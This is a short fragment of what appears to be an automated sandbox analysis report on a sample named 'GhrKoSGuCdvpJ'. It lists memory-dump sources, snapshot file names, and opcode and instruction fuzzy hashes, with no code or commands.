                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3105c169a6047792a2ef5ac839a46869457456e76a57d34d22a92fde09ffa139
                                          • Instruction ID: ec453ca7d97215ed427c373f354b08b04eac8f1aeec07214019a4c157789478b
                                          • Opcode Fuzzy Hash: 3105c169a6047792a2ef5ac839a46869457456e76a57d34d22a92fde09ffa139
                                          • Instruction Fuzzy Hash: 25D0677AB501089FCB159F98E8419DDB776FB98221B048516F925A3260C6319D21EB64
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71c11c8d9068f21572aa96769d5f83dcfa43c522d9819fc63214214e4a7bdb75
                                          • Instruction ID: 0764171eb44b5d44b54de7d0beedd43736a2958d9ecca08204b286d0ac45dd5d
                                          • Opcode Fuzzy Hash: 71c11c8d9068f21572aa96769d5f83dcfa43c522d9819fc63214214e4a7bdb75
                                          • Instruction Fuzzy Hash: 5CC022301103094BC100FB26FC08604333EF6D0101780C125E04A06118DEBC2C824AE0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \;q$\;q$\;q$\;q
                                          • API String ID: 0-2933265366
                                          • Opcode ID: 6c93a09477eb66f7e62e1d10a7738b60396a243d5affb15d655b0d20161177cb
                                          • Instruction ID: 594ead5788b649ba78abf78b06cfe92b22cab01e17603d39b12f7877f0bf3060
                                          • Opcode Fuzzy Hash: 6c93a09477eb66f7e62e1d10a7738b60396a243d5affb15d655b0d20161177cb
                                          • Instruction Fuzzy Hash: BB015A357045158FA724CE29C454EA573E7FBC9762729427AE403CB3A1EAA0DC82CB90